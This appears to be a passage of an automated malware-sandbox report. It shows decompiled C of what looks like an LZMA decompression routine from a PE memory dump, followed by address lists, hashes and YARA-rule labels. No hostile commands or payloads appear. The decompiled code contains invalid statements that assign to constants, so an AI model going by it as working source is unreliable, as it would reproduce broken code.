							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                0x00406035
                0x0040603c
                0x00406042
                0x00406048
                0x00000000
                0x0040604c
                0x00406058
                0x00406058
                0x00406058
                0x00406061
                0x00000000
                0x00000000
                0x00406067
                0x00000000
                0x0040606e
                0x00406072
                0x00000000
                0x00000000
                0x0040607b
                0x0040607e
                0x00406081
                0x00406083
                0x00406085
                0x00000000
                0x00000000
                0x0040608b
                0x0040608e
                0x00406090
                0x00406091
                0x00406094
                0x00406096
                0x00406097
                0x00406099
                0x0040609c
                0x004060a1
                0x004060a6
                0x004060af
                0x004060c2
                0x004060c5
                0x004060ce
                0x004060d1
                0x004060f9
                0x004060f9
                0x004060fb
                0x00406109
                0x00406109
                0x0040610d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004060fd
                0x004060fd
                0x00406100
                0x00406100
                0x00406101
                0x00406101
                0x00000000
                0x004060fd
                0x004060d3
                0x004060d7
                0x004060dc
                0x004060dc
                0x004060e5
                0x004060eb
                0x004060ed
                0x004060f0
                0x00000000
                0x004060f6
                0x004060f6
                0x00000000
                0x004060f6
                0x00000000
                0x00406113
                0x00406113
                0x00406117
                0x004069c3
                0x00000000
                0x004069c3
                0x00406120
                0x00406130
                0x00406133
                0x00406136
                0x00406136
                0x00406136
                0x00406139
                0x00406139
                0x0040613d
                0x00000000
                0x00000000
                0x0040613f
                0x00406142
                0x00406145
                0x0040616f
                0x00406175
                0x0040617c
                0x00000000
                0x0040617c
                0x00406147
                0x0040614b
                0x0040614e
                0x00406153
                0x00406153
                0x0040615e
                0x00406164
                0x00406166
                0x00406169
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004061ae
                0x004061b4
                0x004061b7
                0x004061c4
                0x004061cc
                0x00000000
                0x00000000
                0x00406183
                0x00406183
                0x00406187
                0x004069d2
                0x00000000
                0x004069d2
                0x00406193
                0x0040619e
                0x0040619e
                0x0040619e
                0x004061a1
                0x004061a4
                0x004061a7
                0x004061aa
                0x004061ac
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406843
                0x00406843
                0x00406849
                0x0040684f
                0x00406852
                0x00406855
                0x0040686f
                0x00406872
                0x00406878
                0x00406883
                0x00406883
                0x00406885
                0x00406857
                0x00406857
                0x00406866
                0x0040686a
                0x0040686a
                0x00406888
                0x0040688f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406891
                0x00406891
                0x00406895
                0x00406a44
                0x00000000
                0x00406a44
                0x004068a1
                0x004068a8
                0x004068b0
                0x004068b0
                0x004068b0
                0x004068b3
                0x004068b6
                0x004068b6
                0x00000000
                0x00000000
                0x004061d4
                0x004061d6
                0x004061d9
                0x0040624a
                0x0040624d
                0x00406250
                0x00406257
                0x00406261
                0x00000000
                0x00406261
                0x004061db
                0x004061df
                0x004061e2
                0x004061e4
                0x004061e7
                0x004061ea
                0x004061ec
                0x004061ef
                0x004061f1
                0x004061f6
                0x004061f9
                0x004061fc
                0x00406200
                0x00406207
                0x0040620a
                0x00406211
                0x00406215
                0x0040621d
                0x0040621d
                0x0040621d
                0x00406217
                0x00406217
                0x00406217
                0x0040620c
                0x0040620c
                0x0040620c
                0x00406221
                0x00406224
                0x00406242
                0x00406244
                0x00000000
                0x00406244
                0x00406226
                0x00406229
                0x0040622c
                0x0040622f
                0x00406231
                0x00406231
                0x00406231
                0x00406234
                0x00406237
                0x00406239
                0x0040623a
                0x0040623d
                0x00000000
                0x00000000
                0x00406473
                0x00406477
                0x00406495
                0x00406498
                0x0040649f
                0x004064a2
                0x004064a5
                0x004064a8
                0x004064ab
                0x004064ae
                0x004064b0
                0x004064b7
                0x004064b8
                0x004064ba
                0x004064bd
                0x004064c0
                0x004064c3
                0x004064c3
                0x004064c8
                0x00000000
                0x004064c8
                0x00406479
                0x0040647c
                0x0040647f
                0x00406489
                0x00000000
                0x00000000
                0x004064dd
                0x004064e1
                0x00406504
                0x00406507
                0x0040650a
                0x00406514
                0x004064e3
                0x004064e3
                0x004064e6
                0x004064e9
                0x004064ec
                0x004064f9
                0x004064fc
                0x004064fc
                0x00000000
                0x00000000
                0x00406520
                0x00406524
                0x00000000
                0x00000000
                0x0040652a
                0x0040652e
                0x00000000
                0x00000000
                0x00406534
                0x00406536
                0x0040653a
                0x0040653a
                0x0040653d
                0x00406541
                0x00000000
                0x00000000
                0x00406591
                0x00406595
                0x0040659c
                0x0040659f
                0x004065a2
                0x004065ac
                0x00000000
                0x004065ac
                0x00406597
                0x00000000
                0x00000000
                0x004065b8
                0x004065bc
                0x004065c3
                0x004065c6
                0x004065c9
                0x004065be
                0x004065be
                0x004065be
                0x004065cc
                0x004065cf
                0x004065d2
                0x004065d2
                0x004065d5
                0x004065d8
                0x004065db
                0x004065db
                0x004065de
                0x004065e5
                0x004065ea
                0x00000000
                0x00000000
                0x00406678
                0x00406678
                0x0040667c
                0x00406a1a
                0x00000000
                0x00406a1a
                0x00406682
                0x00406685
                0x00406688
                0x0040668c
                0x0040668f
                0x00406695
                0x00406697
                0x00406697
                0x00406697
                0x0040669a
                0x0040669d
                0x00000000
                0x00000000
                0x0040626d
                0x0040626d
                0x00406271
                0x004069de
                0x00000000
                0x004069de
                0x00406277
                0x0040627a
                0x0040627d
                0x00406281
                0x00406284
                0x0040628a
                0x0040628c
                0x0040628c
                0x0040628c
                0x0040628f
                0x00406292
                0x00406292
                0x00406295
                0x00406298
                0x00000000
                0x00000000
                0x0040629e
                0x004062a4
                0x00000000
                0x00000000
                0x004062aa
                0x004062aa
                0x004062ae
                0x004062b1
                0x004062b4
                0x004062b7
                0x004062ba
                0x004062bb
                0x004062be
                0x004062c0
                0x004062c6
                0x004062c9
                0x004062cc
                0x004062cf
                0x004062d2
                0x004062d5
                0x004062d8
                0x004062f4
                0x004062f7
                0x004062fa
                0x004062fd
                0x00406304
                0x00406308
                0x0040630a
                0x0040630e
                0x004062da
                0x004062da
                0x004062de
                0x004062e6
                0x004062eb
                0x004062ed
                0x004062ef
                0x004062ef
                0x00406311
                0x00406318
                0x0040631b
                0x00000000
                0x00406321
                0x00000000
                0x00406321
                0x00000000
                0x00406326
                0x00406326
                0x0040632a
                0x004069ea
                0x00000000
                0x004069ea
                0x00406330
                0x00406333
                0x00406336
                0x0040633a
                0x0040633d
                0x00406343
                0x00406345
                0x00406345
                0x00406345
                0x00406348
                0x0040634b
                0x0040634b
                0x0040634b
                0x00406351
                0x00000000
                0x00000000
                0x00406353
                0x00406356
                0x00406359
                0x0040635c
                0x0040635f
                0x00406362
                0x00406365
                0x00406368
                0x0040636b
                0x0040636e
                0x00406371
                0x00406389
                0x0040638c
                0x0040638f
                0x00406392
                0x00406392
                0x00406395
                0x00406399
                0x0040639b
                0x00406373
                0x00406373
                0x0040637b
                0x00406380
                0x00406382
                0x00406384
                0x00406384
                0x0040639e
                0x004063a5
                0x004063a8
                0x00000000
                0x004063aa
                0x00000000
                0x004063aa
                0x004063a8
                0x004063af
                0x004063af
                0x004063af
                0x004063af
                0x00000000
                0x00000000
                0x004063ea
                0x004063ea
                0x004063ee
                0x004069f6
                0x00000000
                0x004069f6
                0x004063f4
                0x004063f7
                0x004063fa
                0x004063fe
                0x00406401
                0x00406407
                0x00406409
                0x00406409
                0x00406409
                0x0040640c
                0x0040640f
                0x0040640f
                0x00406415
                0x004063b3
                0x004063b3
                0x004063b6
                0x00000000
                0x004063b6
                0x00406417
                0x00406417
                0x0040641a
                0x0040641d
                0x00406420
                0x00406423
                0x00406426
                0x00406429
                0x0040642c
                0x0040642f
                0x00406432
                0x00406435
                0x0040644d
                0x00406450
                0x00406453
                0x00406456
                0x00406456
                0x00406459
                0x0040645d
                0x0040645f
                0x00406437
                0x00406437
                0x0040643f
                0x00406444
                0x00406446
                0x00406448
                0x00406448
                0x00406462
                0x00406469
                0x0040646c
                0x00000000
                0x0040646e
                0x00000000
                0x0040646e
                0x00000000
                0x004066fb
                0x004066fb
                0x004066ff
                0x00406a26
                0x00000000
                0x00406a26
                0x00406705
                0x00406708
                0x0040670b
                0x0040670f
                0x00406712
                0x00406718
                0x0040671a
                0x0040671a
                0x0040671a
                0x0040671d
                0x00000000
                0x00000000
                0x004064cb
                0x004064cb
                0x004064ce
                0x00000000
                0x00000000
                0x0040680a
                0x0040680e
                0x00406830
                0x00406833
                0x0040683d
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00406810
                0x00406813
                0x00406817
                0x0040681a
                0x0040681a
                0x0040681d
                0x00000000
                0x00000000
                0x004068c7
                0x004068cb
                0x004068e9
                0x004068e9
                0x004068e9
                0x004068f0
                0x004068f7
                0x004068fe
                0x004068fe
                0x00000000
                0x004068fe
                0x004068cd
                0x004068d0
                0x004068d3
                0x004068d6
                0x004068dd
                0x00406821
                0x00406821
                0x00406824
                0x00000000
                0x00000000
                0x004069b8
                0x004069bb
                0x00000000
                0x00000000
                0x004065f2
                0x004065f4
                0x004065fb
                0x004065fc
                0x004065fe
                0x00406601
                0x00000000
                0x00000000
                0x00406609
                0x0040660c
                0x0040660f
                0x00406611
                0x00406613
                0x00406613
                0x00406614
                0x00406617
                0x0040661e
                0x00406621
                0x0040662f
                0x00000000
                0x00000000
                0x00406905
                0x00406905
                0x00406908
                0x0040690f
                0x00000000
                0x00000000
                0x00406914
                0x00406914
                0x00406918
                0x00406a50
                0x00000000
                0x00406a50
                0x0040691e
                0x00406921
                0x00406924
                0x00406928
                0x0040692b
                0x00406931
                0x00406933
                0x00406933
                0x00406933
                0x00406936
                0x00406939
                0x00406939
                0x00406939
                0x00406939
                0x0040693c
                0x0040693c
                0x00406940
                0x004069a0
                0x004069a3
                0x004069a8
                0x004069a9
                0x004069ab
                0x004069ad
                0x004069b0
                0x004068bc
                0x004068bc
                0x00000000
                0x004068bc
                0x00406942
                0x00406948
                0x0040694b
                0x0040694e
                0x00406951
                0x00406954
                0x00406957
                0x0040695a
                0x0040695d
                0x00406960
                0x00406963
                0x0040697c
                0x0040697f
                0x00406982
                0x00406985
                0x00406989
                0x0040698b
                0x0040698b
                0x0040698c
                0x0040698f
                0x00406965
                0x00406965
                0x0040696d
                0x00406972
                0x00406974
                0x00406977
                0x00406977
                0x00406992
                0x00406999
                0x00000000
                0x0040699b
                0x00000000
                0x0040699b
                0x00000000
                0x00406637
                0x0040663a
                0x00406670
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a3
                0x004067a3
                0x004067a6
                0x004067a8
                0x00406a32
                0x00000000
                0x00406a32
                0x004067ae
                0x004067b1
                0x00000000
                0x00000000
                0x004067b7
                0x004067bb
                0x004067be
                0x004067be
                0x004067be
                0x00000000
                0x004067be
                0x0040663c
                0x0040663e
                0x00406640
                0x00406642
                0x00406645
                0x00406646
                0x00406648
                0x0040664a
                0x0040664d
                0x00406650
                0x00406666
                0x0040666b
                0x004066a3
                0x004066a3
                0x004066a7
                0x004066d3
                0x004066d5
                0x004066dc
                0x004066df
                0x004066e2
                0x004066e2
                0x004066e7
                0x004066e7
                0x004066e9
                0x004066ec
                0x004066f3
                0x004066f6
                0x00406723
                0x00406723
                0x00406726
                0x00406729
                0x0040679d
                0x0040679d
                0x0040679d
                0x00000000
                0x0040679d
                0x0040672b
                0x00406731
                0x00406734
                0x00406737
                0x0040673a
                0x0040673d
                0x00406740
                0x00406743
                0x00406746
                0x00406749
                0x0040674c
                0x00406765
                0x00406767
                0x0040676a
                0x0040676b
                0x0040676e
                0x00406770
                0x00406773
                0x00406775
                0x00406777
                0x0040677a
                0x0040677c
                0x0040677f
                0x00406783
                0x00406785
                0x00406785
                0x00406786
                0x00406789
                0x0040678c
                0x0040674e
                0x0040674e
                0x00406756
                0x0040675b
                0x0040675d
                0x00406760
                0x00406760
                0x0040678f
                0x00406796
                0x00406720
                0x00406720
                0x00406720
                0x00406720
                0x00000000
                0x00406798
                0x00000000
                0x00406798
                0x00406796
                0x004066a9
                0x004066ac
                0x004066ae
                0x004066b1
                0x004066b4
                0x004066b7
                0x004066b9
                0x004066bc
                0x004066bf
                0x004066bf
                0x004066c2
                0x004066c2
                0x004066c5
                0x004066cc
                0x004066a0
                0x004066a0
                0x004066a0
                0x004066a0
                0x00000000
                0x004066ce
                0x00000000
                0x004066ce
                0x004066cc
                0x00406652
                0x00406655
                0x00406657
                0x0040665a
                0x00000000
                0x00000000
                0x004063b9
                0x004063b9
                0x004063bd
                0x00406a02
                0x00000000
                0x00406a02
                0x004063c3
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d2
                0x004063d5
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e2
                0x004063e2
                0x004063e2
                0x00000000
                0x00000000
                0x00406544
                0x00406544
                0x00406548
                0x00406a0e
                0x00000000
                0x00406a0e
                0x0040654e
                0x00406551
                0x00406554
                0x00406557
                0x00406559
                0x00406559
                0x00406559
                0x0040655c
                0x0040655f
                0x00406562
                0x00406565
                0x00406568
                0x0040656b
                0x0040656c
                0x0040656e
                0x0040656e
                0x0040656e
                0x00406571
                0x00406574
                0x00406577
                0x0040657a
                0x0040657a
                0x0040657a
                0x0040657d
                0x0040657f
                0x0040657f
                0x00000000
                0x00000000
                0x004067c1
                0x004067c1
                0x004067c1
                0x004067c5
                0x00000000
                0x00000000
                0x004067cb
                0x004067ce
                0x004067d1
                0x004067d4
                0x004067d6
                0x004067d6
                0x004067d6
                0x004067d9
                0x004067dc
                0x004067df
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e9
                0x004067eb
                0x004067eb
                0x004067eb
                0x004067ee
                0x004067f1
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fe
                0x00406800
                0x00406803
                0x00000000
                0x00406805
                0x00406582
                0x00406582
                0x00000000
                0x00406582
                0x00406803
                0x00406a38
                0x00406a5a
                0x00406a60
                0x00406a62
                0x00406a69
                0x00000000
                0x00000000
                0x00406067
                0x00406a6f
                0x00406a6f
                0x00000000

                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                • Instruction ID: b8f14fa8ad5cea51b2b9a2e46606c418b7244df3771cf842608f3b99def8c173
                • Opcode Fuzzy Hash: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                • Instruction Fuzzy Hash: A3818731E00228CFDF24DFA8C8447ADBBB1FB45305F21816AD956BB281C7785A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406473, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E00406473() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406A77))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
